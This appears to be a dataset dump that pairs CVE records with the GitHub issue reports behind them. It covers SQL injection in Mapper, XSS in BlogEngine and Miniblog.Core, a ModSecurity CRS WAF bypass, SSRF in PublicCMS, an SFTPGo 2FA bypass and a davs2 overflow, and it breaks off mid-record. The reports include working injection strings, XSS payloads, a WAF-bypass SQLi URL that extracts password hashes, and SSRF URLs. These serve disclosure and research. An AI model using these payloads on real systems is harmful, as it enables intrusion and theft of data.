cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164 values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1 value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2022-36594 | 2022-09-02T04:15:11.363 | Mapper v4.0.0 to v4.2.0 was discovered to contain a SQL injection vulnerability via the ids parameter at the selectByIds function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/abel533/Mapper/issues/862"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/abel533/Mapper/issues/862"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mybatis:mapper:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94A446F8-F70E-404C-B30D-B85F686F37C0",
"versionEndExcluding": null,
"versionEndIncluding": "4.2.0",
"versionStartExcluding": null,
"versionStartIncluding": "4.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/abel533/Mapper/issues/862 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"abel533",
"Mapper"
] | Write the following test demo:
1、UserController.java:
@Controller
public class UserController {
@Autowired
UserService userService;
@RequestMapping("gets")
@ResponseBody
public List<User> getUser(String ids) {
List<String> idList = Arrays.asList(ids.split(","));
return userService.gets(idList);
}
}
2、UserService.java:
@Service
public interface UserService {
List<User> gets(Collection<String> ids);
}
3、UserServiceImpl.java:
@Service
public class UserServiceImpl implements UserService {
@Autowired
UserMapper userMapper;
@Override
public List<User> gets(Collection<String> ids) {
if (ids == null || ids.isEmpty())
return new ArrayList<>();
String concatIds = StringUtils.concat(ids, "'", ",");
return (List<User>) userMapper.selectByIds(concatIds);
}
}
4、UserMapper.java:
@org.apache.ibatis.annotations.Mapper
public interface UserMapper extends Mapper<User>, MySqlMapper<User>, IdsMapper<User> {
}
5、Access the /gets route in the above demo for sql injection attack:
(1)Under normal circumstances, when the ids parameter value is passed in 1, 2, the data with id 1 and 2 can be obtained:

(2)But when the ids parameter value is 1') or 1=1-- -, you can get all the data in the database:

| selectByIds function sql injection | https://api.github.com/repos/abel533/Mapper/issues/862/comments | 3 | 2022-07-20T06:58:52Z | 2022-07-21T00:53:13Z | https://github.com/abel533/Mapper/issues/862 | 1,310,540,938 | 862 | 4,083 |
CVE-2022-36600 | 2022-09-02T05:15:07.417 | BlogEngine v3.3.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /blogengine/api/posts. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/BlogEngine/BlogEngine.NET/issues/254"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/BlogEngine/BlogEngine.NET/issues/254"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:blogengine:blogengine.net:3.3.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C215046E-4B0C-44AD-B0C4-D055FE17A873",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/BlogEngine/BlogEngine.NET/issues/254 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"BlogEngine",
"BlogEngine.NET"
] | A Cross Site Scripting vulnerabilty exists in BlogEngine via the Description field in /blogengine/api/posts
Step to exploit:
1. Login as admin.
2. Navigate to http://127.0.0.1/blogengine/admin/#/content/posts and click on "NEW".
3. Insert XSS payload `<img src=1 onerror=alert('XSS')>` in the "Description" field and click on SAVE, PUBLISH.
4. Go to Home page.



| Cross-Site Scripting (XSS) in "/blogengine/api/posts" | https://api.github.com/repos/BlogEngine/BlogEngine.NET/issues/254/comments | 0 | 2022-07-20T15:46:07Z | 2022-08-01T03:49:37Z | https://github.com/BlogEngine/BlogEngine.NET/issues/254 | 1,311,382,952 | 254 | 4,084 |
CVE-2022-37679 | 2022-09-02T05:15:07.610 | Miniblog.Core v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /blog/edit. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Excerpt field. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/madskristensen/Miniblog.Core/issues/178"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/madskristensen/Miniblog.Core/issues/178"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:miniblog.core_project:miniblog.core:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "49DAF53E-1D8A-41BA-8408-5B4590DE33B4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/madskristensen/Miniblog.Core/issues/178 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"madskristensen",
"Miniblog.Core"
] | A Cross Site Scripting vulnerabilty exists in Miniblog.Core via the Excerpt field in "/posts"
Step to exploit:
1. Login as admin.
2. Navigate to https://miniblogcore.azurewebsites.net/blog/edit.
3. Insert XSS payload `<img src=1 onerror=alert('XSS')>` in the "Excerpt" field and click on Save.
4. Go to Home page.
<img width="1306" alt="Screenshot 2022-08-01 at 10 26 30" src="https://user-images.githubusercontent.com/35623498/182067426-94e1946a-051d-451a-994f-2f17cd1402c8.png">
<img width="1345" alt="Screenshot 2022-08-01 at 10 27 01" src="https://user-images.githubusercontent.com/35623498/182067447-51601603-eee6-41b2-ac14-d81986619f3f.png">
<img width="1011" alt="Screenshot 2022-08-01 at 10 38 06" src="https://user-images.githubusercontent.com/35623498/182067526-cd8310fa-545e-40ff-8692-89dfa120a635.png">
| Cross-Site Scripting (XSS) in "/posts" | https://api.github.com/repos/madskristensen/Miniblog.Core/issues/178/comments | 0 | 2022-08-01T03:39:09Z | 2022-08-01T03:39:09Z | https://github.com/madskristensen/Miniblog.Core/issues/178 | 1,323,762,815 | 178 | 4,085 |
CVE-2020-22669 | 2022-09-02T18:15:11.607 | Modsecurity owasp-modsecurity-crs 3.2.0 (Paranoia level at PL1) has a SQL injection bypass vulnerability. Attackers can use the comment characters and variable assignments in the SQL syntax to bypass Modsecurity WAF protection and implement SQL injection attacks on Web applications. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1727"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/coreruleset/coreruleset/pull/1793"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00033.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1727"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/coreruleset/coreruleset/pull/1793"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00033.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:owasp:owasp_modsecurity_core_rule_set:3.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2DABE2C3-F827-4B87-8051-7EE4C536FE0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1727 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"SpiderLabs",
"owasp-modsecurity-crs"
] | ### Description
Fuzz found that the following request can bypass modesecurity rules and implement SQLi injection.
sample code:`user.php`(id parameter has SQL injection security issues)
```
<?php
echo "<head><title>SQL injection demo</title></head>";
$id=$_GET['id'];
$conn=new mysqli('127.0.0.1','root','root','test');
if(!$conn){
die("Error to connect database!");
}
$sql="select username from user where id={$id}";
# echo "$sql"."</br></br>";
$res=$conn->query($sql);
if($res){
$row=$res->fetch_row();
echo "\t Hello <b>".htmlspecialchars($row[0])." </b>,having a good day!";
$res->free();
$conn->close();
}
else{
echo "<b>error</b>";
}
?>
```
Database table contents:
```
mysql> use test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from user;
+----+----------+----------------------------------+
| id | username | passwd |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
+----+----------+----------------------------------+
3 rows in set (0.00 sec)
The request is as follows:
```
Normal request
```
http://127.0.0.1/user.php?id=1
```

evil request:
id=1 and 1=1 (blocked by CRS)

request(bypass CRS3.2.0) for SQL injection:
```
http://127.0.0.1/user.php?id=@.:=right(right((select authentication_string from mysql.user limit 0,1),1111),1111) union%23%0adistinctrow%0bselect@.
```

It can be seen that the user password in the user table in the mysql database is successfully obtained through this bypass method.
### Environment
- CRS version (e.g., v3.2.0): v3.2.0
- Paranoia level setting: PL1
- ModSecurity version (e.g., 2.9.3): 2.9.3/3.0.4
- Web Server and version (e.g, apache 2.4.41): apache2.4.18/nginx1.16.1
- Operating System and version: Ubuntu18.04
- Mysql Version: 5.7.29
Looking forward to fixing it as soon as possible beacause it threatens the security of the database content. | SQLi bypass at PL1(CRS 3.2.0) | https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1727/comments | 1 | 2020-03-28T15:47:00Z | 2020-04-03T23:31:41Z | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1727 | 589,601,789 | 1,727 | 4,086 |
CVE-2021-27693 | 2022-09-02T18:15:11.687 | Server-side Request Forgery (SSRF) vulnerability in PublicCMS before 4.0.202011.b via /publiccms/admin/ueditor when the action is catchimage. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/sanluan/PublicCMS/commit/0f4c4872914b6a71305e121a7d9a19c07cde0338"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/sanluan/PublicCMS/issues/51"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/sanluan/PublicCMS/commit/0f4c4872914b6a71305e121a7d9a19c07cde0338"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/sanluan/PublicCMS/issues/51"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:publiccms:publiccms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C947C87C-1E2D-4732-9A7A-84652BCF240E",
"versionEndExcluding": "4.0.202011.b",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"918"
] | 918 | https://github.com/sanluan/PublicCMS/issues/51 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"sanluan",
"PublicCMS"
] | Hello,I found a SSRF in the lastest version of PublicCMS-V4.0.202011.b
The vulnerability is triggered by visiting the following address after logging in the management background
http://192.168.6.237:8081/publiccms/admin/ueditor?action=catchimage&file%5b%5d=http://192.168.103.3
http://192.168.6.237:8081/publiccms/admin/ueditor?action=catchimage&file%5B%5D=https://www.baidu.com
The "file[]" parameter has a loophole, and the IP and domain names that access is not restricted, resulting in an SSRF loophole.
Error is returned when the detection service and port are not open:

Return success when detecting service and port opening:


Attackers can use this vulnerability to scan the internal network for open hosts and ports, and attack applications with vulnerabilities in the internal network, such as redis, struts2, etc., and further gain control of the server system.
PublicCMS is a useful development cms, I think we need to pay attention to and fix this security issue, looking forward to your reply. | There is a SSRF vulnerability via /publiccms/admin/ueditor | https://api.github.com/repos/sanluan/PublicCMS/issues/51/comments | 1 | 2021-02-23T09:33:07Z | 2021-10-28T04:55:16Z | https://github.com/sanluan/PublicCMS/issues/51 | 814,280,961 | 51 | 4,087 |
CVE-2022-36071 | 2022-09-02T18:15:12.150 | SFTPGo is configurable SFTP server with optional HTTP/S, FTP/S and WebDAV support. SFTPGo WebAdmin and WebClient support login using TOTP (Time-based One Time Passwords) as a secondary authentication factor. Because TOTPs are often configured on mobile devices that can be lost, stolen or damaged, SFTPGo also supports recovery codes. These are a set of one time use codes that can be used instead of the TOTP. In SFTPGo versions from version 2.2.0 to 2.3.3 recovery codes can be generated before enabling two-factor authentication. An attacker who knows the user's password could potentially generate some recovery codes and then bypass two-factor authentication after it is enabled on the account at a later time. This issue has been fixed in version 2.3.4. Recovery codes can now only be generated after enabling two-factor authentication and are deleted after disabling it. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.5,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/drakkan/sftpgo/issues/965"
},
{
"source": "security-advisories@github.com",
"tags": [
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/drakkan/sftpgo/security/advisories/GHSA-54qx-8p8w-xhg8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/drakkan/sftpgo/issues/965"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/drakkan/sftpgo/security/advisories/GHSA-54qx-8p8w-xhg8"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sftpgo_project:sftpgo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "154C23FB-9676-4167-A174-476FB50A6C06",
"versionEndExcluding": "2.3.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"916"
] | 916 | https://github.com/drakkan/sftpgo/issues/965 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"drakkan",
"sftpgo"
] | **Area**
Web Client MFA /web/client/mfa
**Summary**
Not sure if this is the expected behaviour, but a user required to use MFA has the option to generate recovery codes
even before configuring and enabling it on account . This option is available after logging in with username / password. This means an attacker that knows the user's password could potentially generate a bunch of recovery codes bypassing 2FA after it enabled on account at a later date.
**Steps to reproduce as Admin**
As an Admin create a new account for a user with a password but enable requirement for MFA.
**Steps to reproduce the behavior user:**
The user logs into the webclient and will get this page

on all other options when the user clicks they get image above

Scroll to bottom and click Generate codes and store it for later.

After enable 2FA
**Expected behavior**
Options to generate codes should not be visible until 2FA has been enabled on account i would have thought?

**System info :**
OS Name: Redhat
OS Version: 9
sftpgo version: SFTPGo 2.3.3-665016e-2022-08-05T08:54:48Z +metrics +azblob +gcs +s3 +bolt +mysql +pgsql +sqlite +portable
sftpgo install source: Yum | TOTP Generate Recovery Codes MFA | https://api.github.com/repos/drakkan/sftpgo/issues/965/comments | 1 | 2022-08-30T16:36:09Z | 2022-09-01T14:23:52Z | https://github.com/drakkan/sftpgo/issues/965 | 1,356,032,979 | 965 | 4,088 |
CVE-2022-36647 | 2022-09-02T22:15:08.523 | PKUVCL davs2 v1.6.205 was discovered to contain a global buffer overflow via the function parse_sequence_header() at source/common/header.cc:269. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pkuvcl/davs2/issues/29"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pkuvcl/davs2/issues/29"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:davs2_project:davs2:1.6.205:*:*:*:*:*:*:*",
"matchCriteriaId": "BC996119-1C77-46E0-AC3D-AB460FB614CC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/pkuvcl/davs2/issues/29 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pkuvcl",
"davs2"
] | **Describe the bug**
Bug Relevant code as follows:
====================================================================================
static
int parse_sequence_header(davs2_mgr_t *mgr, davs2_seq_t *seq, davs2_bs_t *bs)
{
......
seq->head.bitrate = ((seq->bit_rate_upper << 18) + seq->bit_rate_lower) * 400;
seq->head.frame_rate = FRAME_RATE[seq->head.frame_rate_id - 1]; // <------ read overflow here
seq->i_enc_width = ((seq->head.width + MIN_CU_SIZE - 1) >> MIN_CU_SIZE_IN_BIT) << MIN_CU_SIZE_IN_BIT;
seq->i_enc_height = ((seq->head.height + MIN_CU_SIZE - 1) >> MIN_CU_SIZE_IN_BIT) << MIN_CU_SIZE_IN_BIT;
seq->valid_flag = 1;
}
====================================================================================
This is a security issue.
**To Reproduce**
cd /path/to/davs2/build/linux/
./configure --enable-pic
vim config.mak (add -fsanitizer=address to CFLAGS, and -fsanitizer=address -lasan to LDFLAGS)
make
./davs2 -i /path/to/poc1.avs -o test.yuv
**ASAN Crash log**
=================================================================
==4112727==ERROR: AddressSanitizer: global-buffer-overflow on address 0x555555956808 at pc 0x5555555a44d0 bp 0x7fffffffc910 sp 0x7fffffffc900
READ of size 4 at 0x555555956808 thread T0
#0 0x5555555a44cf in parse_sequence_header /root/arayz/davs2/source/common/header.cc:269
#1 0x5555555b1ffb in davs2_parse_header /root/arayz/davs2/source/common/header.cc:1517
#2 0x555555572af9 in decoder_decode_es_unit(davs2_mgr_t*, es_unit_t*) /root/arayz/davs2/source/common/davs2.cc:600
#3 0x555555573617 in davs2_decoder_send_packet /root/arayz/davs2/source/common/davs2.cc:676
#4 0x5555555703b3 in test_decoder /root/arayz/davs2/source/test/test.c:231
#5 0x555555564fdf in main /root/arayz/davs2/source/test/test.c:329
#6 0x7ffff7096d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#7 0x7ffff7096e3f in __libc_start_main_impl ../csu/libc-start.c:392
#8 0x5555555663d4 in _start (/root/arayz/davs2/build/linux/davs2+0x123d4)
0x555555956808 is located 24 bytes to the left of global variable 'BETA_TABLE' defined in '/root/arayz/davs2/source/common/header.cc:69:22' (0x555555956820) of size 64
0x555555956808 is located 8 bytes to the right of global variable 'FRAME_RATE' defined in '/root/arayz/davs2/source/common/header.cc:121:24' (0x5555559567e0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow /root/arayz/davs2/source/common/header.cc:269 in parse_sequence_header
Shadow bytes around the buggy address:
0x0aab2ab22cb0: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 06
0x0aab2ab22cc0: f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9 00 00 00 04
0x0aab2ab22cd0: f9 f9 f9 f9 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9
0x0aab2ab22ce0: 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0aab2ab22cf0: 00 03 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
=>0x0aab2ab22d00: f9[f9]f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x0aab2ab22d10: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
0x0aab2ab22d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aab2ab22d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aab2ab22d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aab2ab22d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==4112727==ABORTING
**Additional context**
- OS: Ubuntu 22.04 (server)
- Compiler gcc version 11.2.0 (Ubuntu 11.2.0-19ubuntu1)
PoC:
[poc1.zip](https://github.com/pkuvcl/davs2/files/9158662/poc1.zip)
| Global-buffer-overflow in parse_sequence_header() --> source/common/header.cc:269 | https://api.github.com/repos/pkuvcl/davs2/issues/29/comments | 3 | 2022-07-21T10:50:43Z | 2022-09-03T13:39:10Z | https://github.com/pkuvcl/davs2/issues/29 | 1,313,064,467 | 29 | 4,089 |
CVE-2022-39829 | 2022-09-05T04:15:08.790 | There is a NULL pointer dereference in aes256_encrypt in Samsung mTower through 0.3.0 due to a missing check on the return value of EVP_CIPHER_CTX_new. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/blob/18f4b592a8a973ce5972f4e2658ea0f6e3686284/tools/ecdsa_keygen.c#L135"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/issues/75"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.openssl.org/docs/manmaster/man3/EVP_CIPHER_CTX_new.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
